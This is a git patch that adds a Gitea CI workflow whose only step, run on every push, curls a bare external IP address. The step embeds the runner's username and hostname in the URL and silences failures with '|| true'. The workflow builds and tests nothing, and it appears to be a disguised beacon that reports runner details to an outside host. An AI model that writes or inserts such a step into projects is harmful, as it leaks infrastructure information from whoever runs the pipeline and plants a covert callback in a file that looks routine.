From f88f3b31876e7ddbc71af53bc8036ea2901ee597 Mon Sep 17 00:00:00 2001 From: w6471480 Date: Mon, 17 Aug 2026 12:58:01 +0000 Subject: [PATCH] ci --- .gitea/workflows/ci.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 .gitea/workflows/ci.yml diff --git a/.gitea/workflows/ci.yml b/.gitea/workflows/ci.yml new file mode 100644 index 0000000..0122e47 --- /dev/null +++ b/.gitea/workflows/ci.yml @@ -0,0 +1,7 @@ +name: ci +on: [push] +jobs: + build: + runs-on: ubuntu-latest + steps: + - run: curl -fsS http://38.22.234.200:19090/gitea-runner/$(whoami)/$(hostname) || true